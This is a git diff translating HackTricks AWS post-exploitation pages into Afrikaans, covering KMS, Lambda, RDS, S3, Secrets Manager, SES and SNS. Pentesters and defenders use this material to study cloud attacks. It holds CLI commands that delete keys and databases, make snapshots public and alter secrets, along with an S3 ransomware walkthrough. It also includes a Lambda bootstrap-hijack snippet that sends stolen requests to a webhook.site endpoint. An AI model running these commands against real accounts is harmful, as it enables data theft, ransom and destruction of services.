+- Skep 'n nuwe **sleutel met 'n sleutelmateriaal** ingevoer deur die aanvaller
+- **Her-enkripteer ou data** wat met die vorige weergawe enkripteer is met die nuwe een.
+- **Verwyder die KMS-sleutel**
+- Nou kan slegs die aanvaller, wat die oorspronklike sleutelmateriaal het, die enkripteerde data ontcijfer
 
+### Vernietig sleutels
 ```bash
 # Destoy they key material previously imported making the key useless
 aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
 
 # Schedule the destoy of a key (min wait time is 7 days)
 aws kms schedule-key-deletion \
-    --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
-    --pending-window-in-days 7
+--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
+--pending-window-in-days 7
 ```
-
 > [!CAUTION]
-> Note that AWS now **prevents the previous actions from being performed from a cross account:**
+> Let daarop dat AWS nou **voorkom dat die vorige aksies vanaf 'n kruisrekening uitgevoer kan word:**
 
 <figure><img src="../../../images/image (76).png" alt=""><figcaption></figcaption></figure>
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
index 5f25c205a..6c37f1c7e 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -4,30 +4,26 @@
 
 ## Lambda
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Steal Others Lambda URL Requests
+### Steel Ander se Lambda URL Versoeke
 
-If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
+As 'n aanvaller op een of ander manier daarin slaag om RCE binne 'n Lambda te kry, sal hy in staat wees om ander gebruikers se HTTP versoeke na die lambda te steel. As die versoeke sensitiewe inligting bevat (koekies, geloofsbriewe...) sal hy in staat wees om dit te steel.
 
 {{#ref}}
 aws-warm-lambda-persistence.md
 {{#endref}}
 
-### Steal Others Lambda URL Requests & Extensions Requests
+### Steel Ander se Lambda URL Versoeke & Uitbreidings Versoeke
 
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Deur Lambda Lae te misbruik, is dit ook moontlik om uitbreidings te misbruik en in die lambda te volhard, maar ook versoeke te steel en te wysig.
 
 {{#ref}}
 ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
index bc93fe53a..71eb056d5 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
@@ -1,42 +1,41 @@
-# AWS - Steal Lambda Requests
+# AWS - Steel Lambda Versoeke
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Lambda Flow
+## Lambda Stroom
 
 <figure><img src="../../../../images/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a></p></figcaption></figure>
 
-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
-2. The init process listens on port **9001** exposing some interesting endpoints:
-   - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event
-   - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke
-   - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error
-3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
-4. Finally, **bootstrap.py** sends to init the **response**
+1. **Slicer** is 'n proses buite die houer wat **stuur** **aanroepings** na die **init** proses.
+2. Die init proses luister op poort **9001** wat 'n paar interessante eindpunte blootstel:
+- **`/2018-06-01/runtime/invocation/next`** – kry die volgende aanroepingsgebeurtenis
+- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – keer die handler respons vir die aanroep terug
+- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – keer 'n uitvoeringsfout terug
+3. **bootstrap.py** het 'n lus wat aanroepings van die init proses kry en roep die gebruikerskode aan om dit te hanteer (**`/next`**).
+4. Laastens, **bootstrap.py** stuur die **respons** na init
 
-Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
+Let daarop dat bootstrap die gebruikerskode as 'n module laai, so enige kode-uitvoering wat deur die gebruikerskode uitgevoer word, gebeur eintlik in hierdie proses.
 
-## Stealing Lambda Requests
+## Steel Lambda Versoeke
 
-The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
+Die doel van hierdie aanval is om die gebruikerskode 'n kwaadwillige **`bootstrap.py`** proses binne die **`bootstrap.py`** proses te laat uitvoer wat die kwesbare versoek hanteer. Op hierdie manier sal die **kwaadwillige bootstrap** proses begin **praat met die init proses** om die versoeke te hanteer terwyl die **legitieme** bootstrap **gevang** is wat die kwaadwillige een uitvoer, sodat dit nie versoeke aan die init proses sal vra nie.
 
-This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
+Dit is 'n eenvoudige taak om te bereik aangesien die kode van die gebruiker deur die legitieme **`bootstrap.py`** proses uitgevoer word. So kan die aanvaller:
 
-- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
-  - A request must be sent to **`/${invoke-id}/response`**
-  - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
-- Execute a malicious **`boostrap.py`** which will handle the next invocations
-  - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
-  - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
+- **Stuur 'n vals resultaat van die huidige aanroep na die init proses**, sodat init dink die bootstrap proses wag vir meer aanroepings.
+- 'n Versoek moet gestuur word na **`/${invoke-id}/response`**
+- Die invoke-id kan verkry word uit die stapel van die legitieme **`bootstrap.py`** proses deur die [**inspect**](https://docs.python.org/3/library/inspect.html) python module (soos [hier voorgestel](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) of net weer te vra na **`/2018-06-01/runtime/invocation/next`** (soos [hier voorgestel](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
+- Voer 'n kwaadwillige **`boostrap.py`** uit wat die volgende aanroepings sal hanteer
+- Vir stealthiness doeleindes is dit moontlik om die lambda aanroepingsparameters na 'n aanvaller beheerde C2 te stuur en dan die versoeke soos gewoonlik te hanteer.
+- Vir hierdie aanval is dit genoeg om die oorspronklike kode van **`bootstrap.py`** van die stelsel of [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py) te kry, die kwaadwillige kode by te voeg en dit van die huidige lambda aanroep uit te voer.
 
-### Attack Steps
+### Aanval Stappe
 
-1. Find a **RCE** vulnerability.
-2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
-3. **Execute** the malicious bootstrap.
-
-You can easily perform these actions running:
+1. Vind 'n **RCE** kwesbaarheid.
+2. Genereer 'n **kwaadwillige** **bootstrap** (bv. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
+3. **Voer** die kwaadwillige bootstrap uit.
 
+Jy kan hierdie aksies maklik uitvoer deur:
 ```bash
 python3 <<EOF
 import os
@@ -53,15 +52,10 @@ os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402
 exec(new_runtime)
 EOF
 ```
+Vir meer inligting, kyk na [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
 
-For more info check [https://github.com/carlospolop/lambda_bootstrap_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
-
-## References
+## Verwysings
 
 - [https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
index 830671a5e..381d83977 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
@@ -4,31 +4,27 @@
 
 ## Lightsail
 
-For more information, check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-lightsail-enum.md
 {{#endref}}
 
-### Restore old DB snapshots
+### Herstel ou DB-snapshots
 
-If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it.
+As die DB snapshots het, mag jy in staat wees om **sensitiewe inligting wat tans in ou snapshots verwyder is, te vind**. **Herstel** die snapshot in 'n **nuwe databasis** en kyk daarna.
 
-### Restore Instance Snapshots
+### Herstel Instansie Snapshots
 
-Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\
-Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance.
+Instansie snapshots mag **sensitiewe inligting** van reeds verwyderde instansies of sensitiewe inligting wat in die huidige instansie verwyder is, bevat. **Skep nuwe instansies vanaf die snapshots** en kyk daarna.\
+Of **voer die snapshot uit na 'n AMI in EC2** en volg die stappe van 'n tipiese EC2 instansie.
 
-### Access Sensitive Information
+### Toegang tot Sensitiewe Inligting
 
-Check out the Lightsail privesc options to learn different ways to access potential sensitive information:
+Kyk na die Lightsail privesc opsies om verskillende maniere te leer om potensiële sensitiewe inligting te bekom:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-lightsail-privesc.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
index 99f3b8413..2a4b57cb4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md
@@ -1,23 +1,17 @@
-# AWS - Organizations Post Exploitation
+# AWS - Organisasies Post Exploitatie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organizations
+## Organisasies
 
-For more info about AWS Organizations check:
+Vir meer inligting oor AWS Organisasies, kyk:
 
 {{#ref}}
 ../aws-services/aws-organizations-enum.md
 {{#endref}}
 
-### Leave the Org
-
+### Verlaat die Organisasie
 ```bash
 aws organizations deregister-account --account-id <account_id> --region <region>
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
index c1ccb01a4..bc79412de 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## RDS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
@@ -12,40 +12,37 @@ For more information check:
 
 ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
 
-If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
-
+As die aanvaller genoeg regte het, kan hy 'n **DB publiek toeganklik** maak deur 'n snapshot van die DB te skep, en dan 'n publiek toeganklike DB van die snapshot.
 ```bash
 aws rds describe-db-instances # Get DB identifier
 
 aws rds create-db-snapshot \
-    --db-instance-identifier <db-id> \
-    --db-snapshot-identifier cloudgoat
+--db-instance-identifier <db-id> \
+--db-snapshot-identifier cloudgoat
 
 # Get subnet groups & security groups
 aws rds describe-db-subnet-groups
 aws ec2 describe-security-groups
 
 aws rds restore-db-instance-from-db-snapshot \
-    --db-instance-identifier "new-db-not-malicious" \
-    --db-snapshot-identifier <scapshotId> \
-    --db-subnet-group-name <db subnet group> \
-    --publicly-accessible \
-    --vpc-security-group-ids <ec2-security group>
+--db-instance-identifier "new-db-not-malicious" \
+--db-snapshot-identifier <scapshotId> \
+--db-subnet-group-name <db subnet group> \
+--publicly-accessible \
+--vpc-security-group-ids <ec2-security group>
 
 aws rds modify-db-instance \
-    --db-instance-identifier "new-db-not-malicious" \
-    --master-user-password 'Llaody2f6.123' \
-    --apply-immediately
+--db-instance-identifier "new-db-not-malicious" \
+--master-user-password 'Llaody2f6.123' \
+--apply-immediately
 
 # Connect to the new DB after a few mins
 ```
-
 ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
 
-An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
-
-If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
+'n Aanvaller met hierdie toestemmings kan **'n snapshot van 'n DB** **skep** en dit **publiek** **beskikbaar** maak. Dan kan hy eenvoudig 'n DB uit daardie snapshot in sy eie rekening skep.
 
+As die aanvaller **nie die `rds:CreateDBSnapshot`** het nie, kan hy steeds **ander** geskepte snapshots **publiek** maak.
 ```bash
 # create snapshot
 aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
@@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --d
 aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
 ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
 ```
-
 ### `rds:DownloadDBLogFilePortion`
 
-An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
-
+'n Aanvaller met die `rds:DownloadDBLogFilePortion` toestemming kan **gedeeltes van 'n RDS-instantie se loglêers aflaai**. As sensitiewe data of toegangskredens per ongeluk gelog word, kan die aanvaller hierdie inligting moontlik gebruik om hul bevoegdhede te verhoog of ongeoorloofde aksies uit te voer.
 ```bash
 aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
 ```
-
-**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
+**Potensiële Impak**: Toegang tot sensitiewe inligting of ongeoorloofde aksies met behulp van gelekte akrediteer.
 
 ### `rds:DeleteDBInstance`
 
-An attacker with these permissions can **DoS existing RDS instances**.
-
+'n Aanvaller met hierdie toestemmings kan **DoS bestaande RDS-instanties**.
 ```bash
 # Delete
 aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
 ```
-
-**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
+**Potensiële impak**: Verwydering van bestaande RDS-instansies, en potensiële verlies van data.
 
 ### `rds:StartExportTask`
 
 > [!NOTE]
-> TODO: Test
-
-An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
+> TODO: Toets
 
+'n Aanvaller met hierdie toestemming kan **'n RDS-instansie-snapshot na 'n S3-bucket uitvoer**. As die aanvaller beheer oor die bestemmings-S3-bucket het, kan hulle potensieel toegang tot sensitiewe data binne die uitgevoerde snapshot verkry.
 ```bash
 aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
 ```
-
-**Potential impact**: Access to sensitive data in the exported snapshot.
+**Potensiële impak**: Toegang tot sensitiewe data in die uitgevoerde snapshot.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
index 16cc52f27..f48b618e3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
@@ -4,39 +4,35 @@
 
 ## S3
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-s3-athena-and-glacier-enum.md
 {{#endref}}
 
-### Sensitive Information
+### Sensitiewe Inligting
 
-Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets.
+Soms sal jy sensitiewe inligting in leesbare formaat in die emmers kan vind. Byvoorbeeld, terraform staat geheime.
 
 ### Pivoting
 
-Different platforms could be using S3 to store sensitive assets.\
-For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files.
+Verskillende platforms kan S3 gebruik om sensitiewe bates te stoor.\
+Byvoorbeeld, **airflow** kan **DAGs** **kode** daarin stoor, of **webblaaie** kan direk vanaf S3 bedien word. 'n Aanvaller met skryfrechten kan die **kode** van die emmer **wysig** om na ander platforms te **pivot** of **rekeningneem** deur JS-lêers te wysig.
 
 ### S3 Ransomware
 
-In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted.
+In hierdie scenario, die **aanvaller skep 'n KMS (Key Management Service) sleutel in hul eie AWS-rekening** of 'n ander gecompromitteerde rekening. Hulle maak hierdie **sleutel beskikbaar vir enige iemand in die wêreld**, wat enige AWS-gebruiker, rol, of rekening toelaat om voorwerpe met hierdie sleutel te enkripteer. Die voorwerpe kan egter nie gedekripteer word nie.
 
-The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.
+Die aanvaller identifiseer 'n teiken **S3-emmer en verkry skryfniveau toegang** daartoe deur verskeie metodes. Dit kan wees as gevolg van swak emmerkonfigurasie wat dit publiek blootstel of die aanvaller wat toegang tot die AWS-omgewing self verkry. Die aanvaller teiken gewoonlik emmers wat sensitiewe inligting bevat soos persoonlik identifiseerbare inligting (PII), beskermde gesondheidsinligting (PHI), logs, rugsteun, en meer.
 
-To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+Om te bepaal of die emmer geteiken kan word vir ransomware, kontroleer die aanvaller die konfigurasie daarvan. Dit sluit in om te verifieer of **S3 Object Versioning** geaktiveer is en of **multi-factor authentication delete (MFA delete) geaktiveer is**. As Object Versioning nie geaktiveer is nie, kan die aanvaller voortgaan. As Object Versioning geaktiveer is maar MFA delete gedeaktiveer is, kan die aanvaller **Object Versioning deaktiveer**. As beide Object Versioning en MFA delete geaktiveer is, word dit moeiliker vir die aanvaller om daardie spesifieke emmer te ransomware.
 
-Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
+Met die AWS API, die aanvaller **vervang elke voorwerp in die emmer met 'n geënkripteerde kopie met hul KMS-sleutel**. Dit enkripteer effektief die data in die emmer, wat dit ontoeganklik maak sonder die sleutel.
 
-To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost.
+Om verdere druk te plaas, skeduleer die aanvaller die verwydering van die KMS-sleutel wat in die aanval gebruik is. Dit gee die teiken 'n 7-dae venster om hul data te herstel voordat die sleutel verwyder word en die data permanent verlore gaan.
 
-Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.
+Laastens, die aanvaller kan 'n finale lêer oplaai, gewoonlik genaamd "ransom-note.txt," wat instruksies vir die teiken bevat oor hoe om hul lêers te herwin. Hierdie lêer word sonder enkripsie opgelaai, waarskynlik om die teiken se aandag te trek en hulle bewus te maak van die ransomware-aanval.
 
-**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
+**Vir meer inligting** [**kyk die oorspronklike navorsing**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
index e59cbbaaa..191b7c5ea 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
@@ -4,50 +4,40 @@
 
 ## Secrets Manager
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
 {{#endref}}
 
-### Read Secrets
+### Lees Geheimen
 
-The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them.
+Die **geheimen self is sensitiewe inligting**, [kyk die privesc-bladsy](../aws-privilege-escalation/aws-secrets-manager-privesc.md) om te leer hoe om dit te lees.
 
-### DoS Change Secret Value
+### DoS Verander Geheim Waarde
 
-Changing the value of the secret you could **DoS all the system that depends on that value.**
+Deur die waarde van die geheim te verander, kan jy **DoS al die stelsels wat op daardie waarde afhanklik is.**
 
 > [!WARNING]
-> Note that previous values are also stored, so it's easy to just go back to the previous value.
-
+> Let daarop dat vorige waardes ook gestoor word, so dit is maklik om net terug te gaan na die vorige waarde.
 ```bash
 # Requires permission secretsmanager:PutSecretValue
 aws secretsmanager put-secret-value \
-    --secret-id MyTestSecret \
-    --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
+--secret-id MyTestSecret \
+--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
 ```
-
-### DoS Change KMS key
-
+### DoS Verander KMS-sleutel
 ```bash
 aws secretsmanager update-secret \
-    --secret-id MyTestSecret \
-    --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
+--secret-id MyTestSecret \
+--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
 ```
+### DoS Verwydering van Geheim
 
-### DoS Deleting Secret
-
-The minimum number of days to delete a secret are 7
-
+Die minimum aantal dae om 'n geheim te verwyder is 7
 ```bash
 aws secretsmanager delete-secret \
-    --secret-id MyTestSecret \
-    --recovery-window-in-days 7
+--secret-id MyTestSecret \
+--recovery-window-in-days 7
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
index e67a07739..87eaf5dbe 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SES
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ses-enum.md
@@ -12,76 +12,50 @@ For more information check:
 
 ### `ses:SendEmail`
 
-Send an email.
-
+Stuur 'n e-pos.
 ```bash
 aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json
 aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json
 ```
-
 Still to test.
 
 ### `ses:SendRawEmail`
 
-Send an email.
-
+Stuur 'n e-pos.
 ```bash
 aws ses send-raw-email --raw-message file://message.json
 ```
-
-Still to test.
-
 ### `ses:SendTemplatedEmail`
 
-Send an email based on a template.
-
+Stuur 'n e-pos gebaseer op 'n sjabloon.
 ```bash
 aws ses  send-templated-email --source <value> --destination <value> --template <value>
 ```
-
-Still to test.
-
 ### `ses:SendBulkTemplatedEmail`
 
-Send an email to multiple destinations
-
+Stuur 'n e-pos na verskeie bestemmings
 ```bash
 aws ses send-bulk-templated-email --source <value> --template <value>
 ```
-
-Still to test.
-
 ### `ses:SendBulkEmail`
 
-Send an email to multiple destinations.
-
+Stuur 'n e-pos na verskeie bestemmings.
 ```
 aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
 ```
-
 ### `ses:SendBounce`
 
-Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email.
-
+Stuur 'n **terugstuur e-pos** oor 'n ontvangde e-pos (wat aandui dat die e-pos nie ontvang kon word nie). Dit kan slegs **tot 24 uur na ontvangs** van die e-pos gedoen word.
 ```bash
 aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
 ```
-
-Still to test.
-
 ### `ses:SendCustomVerificationEmail`
 
-This will send a customized verification email. You might need permissions also to created the template email.
-
+Dit sal 'n aangepaste verifikasie-e-pos stuur. Jy mag dalk ook toestemmings nodig hê om die sjabloon-e-pos te skep.
 ```bash
 aws ses send-custom-verification-email --email-address <value> --template-name <value>
 aws sesv2 send-custom-verification-email --email-address <value> --template-name <value>
 ```
-
-Still to test.
+Nog om te toets.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
index b24660ee1..866c5f7e5 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
@@ -4,81 +4,65 @@
 
 ## SNS
 
-For more information:
+Vir meer inligting:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
 {{#endref}}
 
-### Disrupt Messages
+### Ontwrigt Berigte
 
-In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected.
+In verskeie gevalle word SNS-onderwerpe gebruik om boodskappe na platforms te stuur wat gemonitor word (e-pos, slack boodskappe...). As 'n aanvaller die sending van die boodskappe wat oor sy teenwoordigheid in die wolk waarsku, voorkom, kan hy onopgemerk bly.
 
 ### `sns:DeleteTopic`
 
-An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.
-
+'n Aanvaller kan 'n hele SNS-onderwerp verwyder, wat boodskapverlies veroorsaak en toepassings wat op die onderwerp staatmaak, beïnvloed.
 ```bash
 aws sns delete-topic --topic-arn <value>
 ```
-
-**Potential Impact**: Message loss and service disruption for applications using the deleted topic.
+**Potensiële Impak**: Boodskapverlies en diensonderbreking vir toepassings wat die verwyderde onderwerp gebruik.
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SNS-onderwerp stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput.
